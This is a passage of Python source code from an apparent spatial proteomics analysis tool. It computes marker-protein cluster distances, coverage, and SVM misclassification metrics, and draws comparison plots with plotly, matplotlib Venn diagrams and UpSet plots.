if len(df_cluster) == 0:
return df_cluster
df_cluster.set_index(pd.Index(np.repeat(cluster, len(df_cluster)), name="Cluster"), append=True, inplace=True)
return df_cluster
def calc_cluster_distances(self, df_cluster, complex_profile=np.median, distance_measure="manhattan"):
df_distances = pd.DataFrame()
# loop over experiments
experiments = set(df_cluster.columns.get_level_values("Experiment"))
for exp in experiments:
df_exp = df_cluster.xs(exp, level="Experiment", axis=1)
ref_profile = pd.DataFrame(df_exp.apply(complex_profile, axis=0, result_type="expand")).T
# loop over maps
maps = set(df_exp.columns.get_level_values("Map"))
for m in maps:
if distance_measure == "manhattan":
d_m = pw.manhattan_distances(df_exp.xs(m, level="Map", axis=1), ref_profile.xs(m, level="Map", axis=1))
else:
raise ValueError(distance_measure)
d_m = pd.DataFrame(d_m, columns=[(exp, m)], index=df_exp.index)
df_distances = pd.concat([df_distances, d_m], axis=1)
df_distances.columns = pd.MultiIndex.from_tuples(df_distances.columns, names=["Experiment", "Map"])
return df_distances
def calc_biological_precision(self, experiments=None, clusters=None):
"""
Method to calculate the distance table for assessing biological precision
"""
df_distances = pd.DataFrame()
if experiments is None:
experiments = self.exp_names
if clusters is None:
clusters = self.markerproteins.keys()
for cluster in clusters:
df_cluster = self.get_marker_proteins(experiments, cluster)
if len(df_cluster) == 0:
continue
dists_cluster = self.calc_cluster_distances(df_cluster)
df_distances = df_distances.append(dists_cluster)
df_distances = df_distances.stack(["Experiment", "Map"]).reset_index()\
.sort_values(["Experiment","Gene names"]).rename({0: "distance"}, axis=1)
df_distances.insert(0, "Exp_Map", ["_".join([e,m]) for e,m in zip(df_distances["Experiment"], df_distances["Map"])])
self.df_distance_comp = df_distances
return df_distances
def get_complex_coverage(self, min_n=5):
full_coverage = {}
for complx in self.markerproteins.keys():
df = self.get_marker_proteins(self.exp_names, complx)
if len(df) >= min_n:
full_coverage[complx] = len(df)
partial_coverage = {}
for exp in self.exp_names:
for complx in self.markerproteins.keys():
if complx in full_coverage.keys():
continue
df = self.get_marker_proteins([exp], complx)
#print(df)
if complx in partial_coverage.keys():
partial_coverage[complx].append(len(df))
else:
partial_coverage[complx] = [len(df)]
no_coverage = {}
for k in partial_coverage.keys():
if all([el < min_n for el in partial_coverage[k]]):
no_coverage[k] = partial_coverage[k]
for k in no_coverage.keys():
del partial_coverage[k]
self.coverage_lists = [full_coverage, partial_coverage, no_coverage]
return full_coverage, partial_coverage, no_coverage
def distance_boxplot_comparison(self, cluster_of_interest_comparison="Proteasome", collapse_maps=False, multi_choice=["Exp1", "Exp2"]):
"""
A box plot for desired experiments (multi_choice) and 1 desired cluster is generated displaying the distribution of the e.g.
Manhattan distance. Either the maps for every single experiment are displayed individually or in a combined manner.
Args:
self:
multi_choice: list of experiment names
collapse_maps: boolean
cluster_of_interest_comparison: string, protein cluster (key in markerproteins, e.g. "Proteasome")
map_names: individual map names are stored as an index
df_distance_comp: df_distance_comp: no index, column names: "Gene names", "Cluster", "Protein IDs", "Compartment", "Experiment", "Map",
"Exp_Map", "distance"
"distance": Manhattan distances for each individual protein of the specified clusters (see self.markerproteins) are stored
Returns:
distance_boxplot_figure: boxplot. Along the x-axis the maps, along the y-axis the distances are shown
"""
#an error massage, if no Experiments are selected, will be displayed already, that is why: return ""
if len(multi_choice)>=1:
pass
else:
return ("")
df_distance_comp = self.df_distance_comp.copy()
#set categroical column, allowing lexicographic sorting
df_distance_comp["Experiment_lexicographic_sort"] = pd.Categorical(df_distance_comp["Experiment"], categories=multi_choice, ordered=True)
df_distance_comp.sort_values(["Experiment_lexicographic_sort", "Map"], inplace=True)
if collapse_maps == False:
#get only values form experiment of interest
df_distance_selectedExp = df_distance_comp.loc[df_distance_comp["Experiment"].isin(multi_choice)]
#get only values form cluster of interest
df_distance_selectedExp = df_distance_selectedExp.loc[df_distance_selectedExp["Cluster"]==cluster_of_interest_comparison]
if df_distance_selectedExp.shape[0] == 0:
self.cache_cluster_quantified = False
else:
individual_distance_boxplot_figure=go.Figure()
for i, exp in enumerate(multi_choice):
df_plot=df_distance_selectedExp[df_distance_selectedExp["Experiment"]==exp]
individual_distance_boxplot_figure.add_trace(go.Box(
x=[df_plot["Experiment"], df_plot["Map"]],
y=df_plot["distance"],
#line=dict(color=pio.templates["simple_white"].layout["colorway"][i]),
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
name=exp,
hovertext=df_plot["Gene names"]
))
individual_distance_boxplot_figure.update_layout(boxmode="group",
xaxis_tickangle=90,
title="Manhattan distance distribution for <br>the protein cluster: {}".format(cluster_of_interest_comparison),
autosize=False,
width=350*len(multi_choice),
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Experiment",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Distance",
mirror=True),
template="simple_white")
return individual_distance_boxplot_figure
else:
map_or_exp_names = multi_choice
level_of_interest = "Experiment"
boxplot_color = "Experiment"
df_distance_selectedExp_global = df_distance_comp
# "Gene names", "Map", "Cluster" and transferred into the index
df_distance_selectedExp_global.set_index(["Gene names", level_of_interest, "Cluster"], inplace=True)
df_cluster_xmaps_distance_global = pd.DataFrame()
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_distance_selectedExp_global" and appended to the new dataframe df_cluster_xmaps_distance_global
for map_or_exp in map_or_exp_names:
plot_try = df_distance_selectedExp_global.xs((cluster_of_interest_comparison, map_or_exp), level=["Cluster",
level_of_interest], drop_level=False)
df_cluster_xmaps_distance_global = df_cluster_xmaps_distance_global.append(plot_try)
df_cluster_xmaps_distance_global.sort_values("Experiment_lexicographic_sort", inplace=True)
df_cluster_xmaps_distance_global.reset_index(inplace=True)
distance_boxplot_figure = px.box(df_cluster_xmaps_distance_global,
x=level_of_interest,
y="distance",
points="all",
hover_name="Gene names",
color=boxplot_color,
template="simple_white",
title="Global Manhattan distance distribution for the protein cluster: {}".format(cluster_of_interest_comparison)
)
distance_boxplot_figure.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="distance",
mirror=True),
template="simple_white"
)
return distance_boxplot_figure
def plot_biological_precision(self, multi_choice=None, clusters_for_ranking=None, min_members=5, reference=""):
if multi_choice is None:
multi_choice = self.exp_names
if clusters_for_ranking is None:
clusters_for_ranking = self.clusters_for_ranking
if len(multi_choice) == 0 or len(clusters_for_ranking) == 0:
return("Please provide at least one experiment and one cluster for ranking")
df = self.df_distance_comp.copy()
df = df[df["Experiment"].isin(multi_choice)]
df = df[df["Cluster"].isin(clusters_for_ranking)]
df_m = df.groupby(["Cluster", "Experiment", "Map"]).filter(lambda x: len(x)>=min_members)
df_c = df_m.groupby(["Cluster", "Experiment"]).median().reset_index()
df_m = df_m.groupby(["Cluster", "Experiment", "Map"]).median().reset_index()
df_m = df_m.assign(Experiment_lexicographic_sort = pd.Categorical(df_m["Experiment"], categories=multi_choice, ordered=True))
df_m = df_m.sort_values("Experiment_lexicographic_sort").drop("Experiment_lexicographic_sort", axis=1)\
.groupby("Experiment", as_index=False, group_keys=False, sort=False).apply(lambda x: x.sort_values("distance", ascending=False))
df_c = df_c.assign(Experiment_lexicographic_sort = pd.Categorical(df_c["Experiment"], categories=multi_choice, ordered=True))
df_c = df_c.sort_values("Experiment_lexicographic_sort").drop("Experiment_lexicographic_sort", axis=1)\
.groupby("Experiment", as_index=False, group_keys=False, sort=False).apply(lambda x: x.sort_values("distance", ascending=False))
bp_stacked_bar = px.bar(df_m, x="Experiment", y="distance", color="Cluster", hover_data=["Map"],
width=400+80*len(multi_choice), template="simple_white", height=100+30*len(clusters_for_ranking)).update_layout(legend_traceorder="reversed")
bp_box_minus_min = px.box(df_m.set_index(["Experiment", "Cluster", "Map"]).unstack(["Experiment", "Map"])\
.apply(lambda x: x-x.min(), axis=1).stack(["Experiment", "Map"]).reset_index()\
.sort_values(["Experiment"], key=lambda x: [multi_choice.index(el) for el in x]),
x="Experiment", y="distance", color="Experiment", hover_data=["Cluster", "Map"],
width=200+100*len(multi_choice), template="simple_white", height=400, points="all")\
.update_yaxes(title="distance - cluster offset (minimum)")
bp_box_minus_ref = px.box(df_c.set_index(["Experiment", "Cluster"]).unstack(["Experiment"])\
.apply(lambda x: x/x[("distance", reference)], axis=1).stack(["Experiment"]).reset_index()\
.sort_values(["Experiment"], key=lambda x: [multi_choice.index(el) for el in x])\
.loc[lambda x: x.Experiment != reference],
x="Experiment", y="distance", color="Experiment", hover_data=["Cluster"],
color_discrete_sequence=[px.colors.qualitative.D3[multi_choice.index(el)]
for el in multi_choice if el != reference],
width=200+100*len(multi_choice), template="simple_white", height=400, points="all")\
.update_yaxes(title="distance relative to {}".format(reference))
return bp_stacked_bar, bp_box_minus_min, bp_box_minus_ref
def distance_ranking_barplot_comparison(self, collapse_cluster=False, multi_choice=["Exp1", "Exp2"], clusters_for_ranking=None, ranking_boxPlot="Box plot"):#, toggle_sumORmedian=False):
#ref_exp="Exp1",
if clusters_for_ranking is None:
clusters_for_ranking = self.clusters_for_ranking
#an error massage, if no Experiments are selected, will be displayed already, that is why: return ""
if len(multi_choice)>=1:
pass
else:
return ("")
#dict_cluster_normalizedMedian = {}
#multi_choice = i_multi_choice.value
#clusters_for_ranking = i_clusters_for_ranking.value
df_distance_comp = self.df_distance_comp.copy()
df_distance_comp = df_distance_comp[df_distance_comp["Experiment"].isin(multi_choice)]
df_distance_comp = df_distance_comp[df_distance_comp["Cluster"].isin(clusters_for_ranking)]
df_quantified_cluster = df_distance_comp.reset_index()
df_quantified_cluster = df_distance_comp.drop_duplicates(subset=["Cluster", "Experiment"]).set_index(["Cluster",
"Experiment"])["distance"].unstack("Cluster")
self.df_quantified_cluster = df_quantified_cluster.notnull().replace({True: "x", False: "-"})
dict_quantified_cluster = {}
dict_cluster_normalizedMedian_ref = {}
dict_median_distance_ranking = {}
for cluster in clusters_for_ranking:
try:
df_cluster = df_distance_comp[df_distance_comp["Cluster"]==cluster]
cluster_quantitity = df_cluster["Gene names"].unique().size
if cluster_quantitity>= 5:
dict_quantified_cluster[cluster] = cluster_quantitity
all_median_one_cluster_several_exp = {}
#ref = df_cluster["distance"].median()
for exp in multi_choice:
median = df_cluster[df_cluster["Experiment"]==exp]["distance"].median()
all_median_one_cluster_several_exp[exp] = float(median)
#new
#if exp == ref_exp:
# ref = median
ref = np.median(list(all_median_one_cluster_several_exp.values()))
dict_median_distance_ranking[cluster] = all_median_one_cluster_several_exp
median_ranking_ref = {exp: median/ref for exp, median in all_median_one_cluster_several_exp.items()}
dict_cluster_normalizedMedian_ref[cluster] = median_ranking_ref
else:
continue
except:
continue
self.cluster_above_treshold = dict_quantified_cluster.keys()
self.df_quantified_cluster2 = pd.DataFrame.from_dict({"Number of PG per Cluster":dict_quantified_cluster}).T
df_cluster_normalizedMedian_ref = pd.DataFrame(dict_cluster_normalizedMedian_ref)
df_cluster_normalizedMedian_ref.index.name="Experiment"
df_cluster_normalizedMedian_ref.rename_axis("Cluster", axis=1, inplace=True)
#median makes a huge differnece, improves result of DIA, MQ, libary
df_RelDistanceRanking = pd.concat([df_cluster_normalizedMedian_ref.median(axis=1), df_cluster_normalizedMedian_ref.sem(axis=1)], axis=1,
keys=["Distance Ranking (rel, median)", "SEM"]).reset_index().sort_values("Distance Ranking (rel, median)")
ranking_sum = df_cluster_normalizedMedian_ref.sum(axis=1).round(2)
ranking_sum.name = "Normalized Median - Sum"
df_ranking_sum = ranking_sum.reset_index()
#ranking_product = df_cluster_normalizedMedian.product(axis=1).round(2)
#ranking_product.name = "Normalized Median - Product"
#df_globalRanking = pd.concat([pd.DataFrame(ranking_sum), pd.DataFrame(ranking_product)], axis=1).reset_index()
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.stack("Cluster")
df_cluster_normalizedMedian_ref.name="Normalized Median"
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.reset_index()
self.df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.assign(Experiment_lexicographic_sort = pd.Categorical(df_cluster_normalizedMedian_ref["Experiment"], categories=multi_choice, ordered=True))
df_cluster_normalizedMedian_ref.sort_values("Experiment_lexicographic_sort", inplace=True)
if collapse_cluster == False:
fig_ranking = px.bar(df_cluster_normalizedMedian_ref,
x="Cluster",
y="Normalized Median",
color="Experiment",
barmode="group",
title="Ranking - normalization to reference experiments the median across all experiments for each cluster",
template="simple_white"
)
fig_ranking.update_xaxes(categoryorder="total ascending")
fig_ranking.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
return fig_ranking
else:
if ranking_boxPlot == "Bar plot - median":
fig_globalRanking = px.bar(df_RelDistanceRanking.sort_values("Distance Ranking (rel, median)"),
x="Experiment",
y="Distance Ranking (rel, median)",
title="Median manhattan distance distribution for <br>all protein clusters (n>=5 per cluster)",# - median of all individual normalized medians - reference experiment is the median across all experiments for each cluster",
error_x="SEM", error_y="SEM",
color="Experiment",
template="simple_white")
if ranking_boxPlot == "Box plot":
fig_globalRanking = px.box(df_cluster_normalizedMedian_ref,
x="Experiment",
y="Normalized Median",
title="Median manhattan distance distribution for <br>all protein clusters (n>=5 per cluster)",# "Ranking - median of all individual normalized medians - reference is the median across all experiments for each cluster",
color="Experiment",
points="all",
template="simple_white",
hover_name="Cluster")
#return pn.Column(pn.Row(fig_globalRanking), pn.Row(fig_globalRanking2))
else:
fig_globalRanking = px.bar(df_ranking_sum.sort_values("Normalized Median - Sum"),
x="Experiment",
template="simple_white",
y="Normalized Median - Sum",
title="Ranking - median of all individual normalized medians - reference is the median across all experiments for each cluster",
color="Experiment")
fig_globalRanking.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return fig_globalRanking
def quantity_pr_pg_barplot_comparison(self, multi_choice=["Exp1", "Exp2"]):
"""
Barplot, showing number of protein groups/profiles.
Args:
self:
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
multi_choice: list of experiment names
Returns:
fig_quantity_pr_pg: barplot, number of protein groups/profiles before/after filtering of the intersection/total quantity
"""
df_quantity_pr_pg_combined = self.df_quantity_pr_pg_combined.copy()
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined[df_quantity_pr_pg_combined["Experiment"].isin(multi_choice)]
df_quantity_pr_pg_combined.insert(0,"Expxfiltering",[" ".join([e,f]) for e,f in zip(
df_quantity_pr_pg_combined.Experiment, df_quantity_pr_pg_combined.filtering)])
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined.assign(
Experiment_lexicographic_sort = pd.Categorical(df_quantity_pr_pg_combined["Experiment"], categories=multi_choice, ordered=True))
df_quantity_pr_pg_combined.sort_values(["Experiment_lexicographic_sort", "type"], ascending=[True, False], inplace=True)
layout = go.Layout(barmode="overlay",
#xaxis_tickangle=90,
autosize=False,
width=100*len(multi_choice)+150,
height=400,
template="simple_white")
filtered = list(np.tile(["id","profile"],len(multi_choice)))
fig_quantity_pg = px.bar(df_quantity_pr_pg_combined, x="Expxfiltering", y="number of protein groups",
color="Experiment", barmode="overlay", hover_data=["type"],
opacity=0.8, color_discrete_sequence=px.colors.qualitative.D3)
fig_quantity_pg.update_layout(layout, title="Number of Protein Groups",
xaxis={"tickmode":"array", "tickvals":[el for el in range(len(multi_choice)*2)],
"ticktext":filtered, "title": {"text": None}})
fig_quantity_pr = px.bar(df_quantity_pr_pg_combined, x="filtering", y="number of profiles",
color="type", barmode="overlay", labels={"Experiment":"", "filtering":""},
facet_col="Experiment",template="simple_white", opacity=1)\
.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
fig_quantity_pr.update_layout(layout, title="Number of Profiles" )
return fig_quantity_pg, fig_quantity_pr
def coverage_comparison(self, multi_choice=["Exp1", "Exp2"]):
"""
Barplot, showing data completeness of profiles.
Args:
self:
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
multi_choice: list of experiment names
Returns:
fig_pr_dc: barplot, data completeness of profiles before/after filtering of intersection/total qunatity
"""
df_quantity_pr_pg_combined = self.df_quantity_pr_pg_combined.copy()
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined[df_quantity_pr_pg_combined["Experiment"].isin(multi_choice)].sort_values("filtering")
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined.assign(
Experiment_lexicographic_sort = pd.Categorical(df_quantity_pr_pg_combined["Experiment"],
categories=multi_choice, ordered=True))
#df_quantity_pr_pg_combined.sort_values("Experiment_lexicographic_sort", inplace=True)
df_quantity_pr_pg_combined.sort_values(["Experiment_lexicographic_sort", "filtering"], inplace=True)
fig_pr_dc = px.bar(df_quantity_pr_pg_combined.loc[df_quantity_pr_pg_combined.type=="total"], x="Experiment", y="data completeness of profiles",
color="Experiment", barmode="overlay", hover_data=["filtering"],
template="simple_white", opacity=0.8)
fig_pr_dc.update_layout(#barmode="overlay",
#xaxis_tickangle=90,
title="Profile completeness of all<br>identified protein groups",
autosize=False,
width=100*len(multi_choice)+150,
height=400,
template="simple_white")
return fig_pr_dc
def venn_sections(self, multi_choice_venn=["Exp1"]):
"""
UpsetPlot is created based on list of experiments. If 2/3 experiments are given, the Upsetlot displays all possible
mutually exclusive overlapping combinations of these experiments. Additionally a Venn Diagram is created using matplotlib.
Latter figure has to be transformed from matplotlib object to jpg, to make it available for the webinterface via panel/holoviz.
If more than 3 experiments are given, the UpsetPlot will be calculated only for those combinations of these experiments with at least 300 entries.
Another way to think of this is the mutually exclusive sections of a venn diagram of the sets. If the original list has N sets,
the returned list will have (2**N)-1 sets.
Args:
multi_choice_venn: list of experiment names
self:
unique_proteins_total: dict, key: Experiment name, value: unique protein (groups)
Returns:
im: Venn diagram, made availabe flor plotly/webinterface
figure_UpSetPlot: Upsetplot figure
combinations : list of tuple
tag : str
Binary string representing which sets are included / excluded in
the combination.
set : set
The set formed by the overlapping input sets.
"""
def create_upsetplot(sets, multi_choice):
num_combinations = 2 ** len(sets)
bit_flags = [2 ** n for n in range(len(sets))]
flags_zip_sets = [z for z in zip(bit_flags, sets)]
combo_sets = []
overlapping_ids = []
experiments = []
#dictio = {}
for bits in range(num_combinations - 1, 0, -1):
include_sets = [s for flag, s in flags_zip_sets if bits & flag]
exclude_sets = [s for flag, s in flags_zip_sets if not bits & flag]
combo = set.intersection(*include_sets)
combo = set.difference(combo, *exclude_sets)
tag = "".join([str(int((bits & flag) > 0)) for flag in bit_flags])
experiment_decoded = []
for digit, exp in zip(list(tag), multi_choice):
if digit=="0":
continue
else:
experiment_decoded.append(exp)
#dictio[len(combo)] = experiment_decoded
if len(multi_choice)>3:
if len(combo)>300:
overlapping_ids.append(len(combo))
experiments.append(experiment_decoded)
else:
if len(combo)>0:
overlapping_ids.append(len(combo))
experiments.append(experiment_decoded)
#combo_sets.append((tag, len(combo)))
fig_UpSetPlot = plt.Figure()
series_UpSetPlot = from_memberships(experiments, data=overlapping_ids)
upplot(series_UpSetPlot, fig=fig_UpSetPlot, show_counts="%d")
return fig_UpSetPlot
if "Sequence" not in self.df_01_filtered_combined.index.names:
sets_proteins_total = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").index.get_level_values("Protein IDs"))
for i in multi_choice_venn]
sets_proteins_intersection = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").unstack(["Map", "Exp_Map"]).dropna()\
.index.get_level_values("Protein IDs")) for i in multi_choice_venn]
else:
sets_proteins_total = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").index.get_level_values("Sequence"))
for i in multi_choice_venn]
sets_proteins_intersection = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").unstack(["Map", "Exp_Map"]).dropna()\
.index.get_level_values("Sequence")) for i in multi_choice_venn]
figure_UpSetPlot_total = create_upsetplot(sets_proteins_total, multi_choice_venn)
figure_UpSetPlot_int = create_upsetplot(sets_proteins_intersection, multi_choice_venn)
#make matplot figure available for plotly
def convert_venn_jpg(vd):
vd = vd.figure
out_img = BytesIO()
plt.savefig(out_img, bbox_inches="tight",format="jpg", dpi=72)
out_img.seek(0) # rewind file
im = Image.open(out_img)
plt.clf()
return im
if len(multi_choice_venn) == 2:
vd_t = venn2(sets_proteins_total, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:2], alpha=0.8)
vd_t = plt.title("in at least one map")
im_t = convert_venn_jpg(vd_t)
vd_i = venn2(sets_proteins_intersection, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:2], alpha=0.8)
vd_i = plt.title("in all maps")
im_i = convert_venn_jpg(vd_i)
elif len(multi_choice_venn) == 3:
vd_t = venn3(sets_proteins_total, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:3], alpha=0.8)
vd_t = plt.title("in at least one map")
im_t = convert_venn_jpg(vd_t)
vd_i = venn3(sets_proteins_intersection, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:3], alpha=0.8)
vd_i = plt.title("in all maps")
im_i = convert_venn_jpg(vd_i)
else:
im = "Venn diagram can be displayed for 3 Experiments or less"
return im,im, figure_UpSetPlot_total, figure_UpSetPlot_int
return im_t, im_i, figure_UpSetPlot_total, figure_UpSetPlot_int
def dynamic_range_comparison(self, collapse_cluster=False, multi_choice=["Exp1", "Exp2"], ref_exp="Exp1"):
"""
A box plot for desired experiments (multi_choice) and all protein clusters is generated displaying the dynamic range
Args:
self:
multi_choice: list of experiment names
df_dynamicRange_combined: df, no index, column names: "Max", "Min", "Dynamic Range", "Cluster", "Experiment"
Returns:
fig_dynamic_range: bar plot, dynamic range of each protein cluster for desired experiments is displayed.
"""
df_dynamicRange_combined = self.df_dynamicRange_combined.copy()
df_dynamicRange_combined = df_dynamicRange_combined[df_dynamicRange_combined["Experiment"].isin(multi_choice)]
df_dynamicRange_combined = df_dynamicRange_combined.assign(Experiment_lexicographic_sort = pd.Categorical(df_dynamicRange_combined["Experiment"],
categories=multi_choice, ordered=True))
df_dynamicRange_combined.sort_values(["Experiment_lexicographic_sort", "Dynamic Range"], inplace=True)
fig_dynamic_range = px.bar(df_dynamicRange_combined,
x="Cluster",
y="Dynamic Range",
base="Min",
facet_row="Experiment",
template="simple_white",
height=400*len(multi_choice),
width=1200)
df_dynamicRange_combined_ref = df_dynamicRange_combined.drop(["Experiment_lexicographic_sort"], axis=1)
df_dynamicRange_combined_ref = df_dynamicRange_combined.set_index(["Cluster", "Experiment"], drop=False).unstack("Cluster")["Dynamic Range"]
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.div(df_dynamicRange_combined_ref.xs(ref_exp))
df_RelDynamicRange = pd.concat([df_dynamicRange_combined_ref.median(axis=1), df_dynamicRange_combined_ref.sem(axis=1)], axis=1,
keys=["Dynamic Range (rel, median)", "SEM"]).reset_index()
if collapse_cluster == False:
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.stack("Cluster")
df_dynamicRange_combined_ref.name="Normalized Dynamic Range"
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.reset_index()
fig_RelDynamicRange = px.bar(df_dynamicRange_combined_ref,
x="Cluster",
y="Normalized Dynamic Range",
title="Dynamic Range - normalization to reference experiment: {}".format(ref_exp),
barmode="group",
template="simple_white",
color="Experiment")
fig_RelDynamicRange.update_xaxes(categoryorder="total ascending")
fig_RelDynamicRange.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
else:
fig_RelDynamicRange = px.bar(df_RelDynamicRange.sort_values("Dynamic Range (rel, median)"),
x="Experiment",
y="Dynamic Range (rel, median)",
error_x="SEM", error_y="SEM",
template="simple_white",
title="Dynamic Range - median of all individual normalized medians - reference experiment: {}".format(ref_exp),
color="Experiment")
fig_RelDynamicRange.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return pn.Column(pn.Row(fig_dynamic_range), pn.Row(fig_RelDynamicRange))
def calculate_global_scatter(self, multi_choice, metric, consolidation):
"""
A distribution plot of the profile scatter in each experiment is generated, with variable distance metric and consolidation of replicates.
Args:
self:
df_01_filtered_combined: df, indexed
multi_choice: list of experiment names
metric: distance metric, one of 'euclidean distance', 'manhattan distance', '1 - cosine correlation', '1 - pearson correlation'
consolidation: method to consolidate replicate distances, one of 'median', 'average', 'sum'
Returns:
plot: plotly.figure_factory.displot, shows kernel density estiamtion in the main pane and a rug plot underneath. Traces are sorted by ascending median of the distribution.
"""
# Option dictionaries
cons_functions = {
"median": np.median,
"average": np.mean,
"sum": np.sum
}
metrics = {
"euclidean distance": "euclidean",
"manhattan distance": "manhattan",
"1 - cosine correlation": "cosine",
"1 - pearson correlation": lambda x,y: 1-np.corrcoef(x,y)[0][1],
"manhattan distance to average profile": [np.mean, pw.paired_manhattan_distances],
"manhattan distance to median profile": [np.median, pw.paired_manhattan_distances]
}
# Option assertion
assert consolidation in cons_functions.keys()
assert metric in metrics.keys()
# Filter experiments and intersection of proteins
df = self.df_01_filtered_combined.loc[
self.df_01_filtered_combined.index.get_level_values("Experiment").isin(multi_choice)].copy()
df.index = df.index.droplevel(["Exp_Map", "Gene names", "Compartment"])
if "Sequence" in df.index.names:
df.index = df.index.droplevel(["Protein IDs"])
df_across = df.unstack(["Experiment", "Map"]).dropna().stack(["Experiment", "Map"])
nPG = df_across.unstack(["Experiment", "Map"]).shape[0]
# Calculate and consolidate distances
distances = pd.DataFrame()
for exp in multi_choice:
df_m = df_across.xs(exp, level="Experiment", axis=0)
maps = list(set(df_m.index.get_level_values("Map")))
# this if clause switches between pairwise comparisons of profiles (else) and comparisons to an average/median profile
if " to " in metric:
df_m = df_m.unstack("Map")
# calculate reference profiles
df_profiles = df_m.stack("Fraction").apply(metrics[metric][0], axis=1).unstack("Fraction")
# calculate the distance for every map
distances_m = pd.DataFrame()
for m in maps:
dist_m = pd.DataFrame(metrics[metric][1](df_m.xs(m, level="Map", axis=1), df_profiles), columns = [m])
distances_m = pd.concat([distances_m, dist_m], axis=1)
distances_m.index = df_m.index
else:
distances_m = pd.DataFrame()
# loop over pairs of maps
for i,mapi in enumerate(maps):
for j,mapj in enumerate(maps):
# only look at each comparison once
if j <= i:
continue
dist = pw.paired_distances(df_m.xs(mapi, level="Map", axis=0).values,
df_m.xs(mapj, level="Map", axis=0).values,
metric = metrics[metric])
dist = pd.Series(dist, name="_".join([mapi,mapj]))
distances_m = pd.concat([distances_m, dist], axis=1)
distances_m.index = df_m.xs(maps[0], level="Map", axis=0).index
distances = pd.concat([distances, pd.Series(distances_m.apply(cons_functions[consolidation], axis=1), name=exp)], axis=1)
distances.index = distances_m.index
self.distances = distances
# Create and return plot
plot = ff.create_distplot(distances.T.values, distances.columns, show_hist=False)
plot.update_layout(title="Distribution of {} {}s, n = {}".format(metric, consolidation, nPG),
width=1500, height=600, template="simple_white", xaxis={"rangemode": "nonnegative"})
return plot
def svm_processing(self):
"""
The misclassification matrix, generated by Perseus, will be used for Recall/Precision calculation of each individual cluster and on a global level.
Data will be stored in a local dictionary that will be assigned to the global dictionary.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
self.analysed_datasets_dict:
local dictionary (SVM_dict) will be assigned to the global dictionary self.analysed_datasets_dict, that is available for downloading
{"Experiment name" : {see def read_jsonFile(self) [below]}
{"Misclassification Analysis":
{
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {...}
}
}
}
"""
global_SVM_dict_total = {}
global_SVM_dict = {}
for exp in self.json_dict.keys():
try:
df_SVM = pd.read_json(self.json_dict[exp]["Misclassification Matrix"])
df_SVM["T: True group"] = df_SVM["T: True group"].str.replace(r'True: ', '')
except KeyError:
continue
SVM_dict = {}
all_correct = np.diag(df_SVM)
members = df_SVM.sum(axis=1)
total_members = 0
membrame_members = 0
membrane_correct = 0
all_organelle_recall = []
all_organelle_precision = []
all_organelle_f1 = []
F1_all_cluster = []
no_of_membrane_clusters = 0
total_correct = sum(all_correct)
predicted_one_organelle = df_SVM.sum(axis=0)
for i in range(len(df_SVM)):
total_members = total_members + members[i]
recall = all_correct[i]/members[i]
fdr = (predicted_one_organelle[i]-all_correct[i])/predicted_one_organelle[i]
precision = 1-fdr
F1 = statistics.harmonic_mean([recall, precision])
F1_all_cluster.append(F1)
SVM_dict[df_SVM["T: True group"][i]] = {"Recall": recall, "FDR": fdr, "Precision": precision, "F1": F1}
if df_SVM["T: True group"][i]!="Nuclear pore complex" and df_SVM["T: True group"][i]!="Large Protein Complex" and df_SVM["T: True group"][i]!="Actin binding proteins" :
no_of_membrane_clusters = no_of_membrane_clusters+1
membrame_members = membrame_members + members[i]
membrane_correct = membrane_correct + all_correct[i]
all_organelle_f1.append(F1)
all_organelle_recall.append(recall)
all_organelle_precision.append(precision)
total_recall = total_correct/total_members
membrane_recall = membrane_correct/membrame_members
av_per_organelle_recall = statistics.mean(all_organelle_recall)
median_per_organelle_recall = statistics.median(all_organelle_recall)
av_per_organelle_precision = statistics.mean(all_organelle_precision)
avg_organelle_f1 = statistics.mean(all_organelle_f1)
avg_F1_all_cluster = statistics.mean(F1_all_cluster)
SVM_dict_total = {}
SVM_dict_total["Avg. all clusters"] = {"Recall": total_recall, "F1": avg_F1_all_cluster} #total recall = marker prediction accuracy
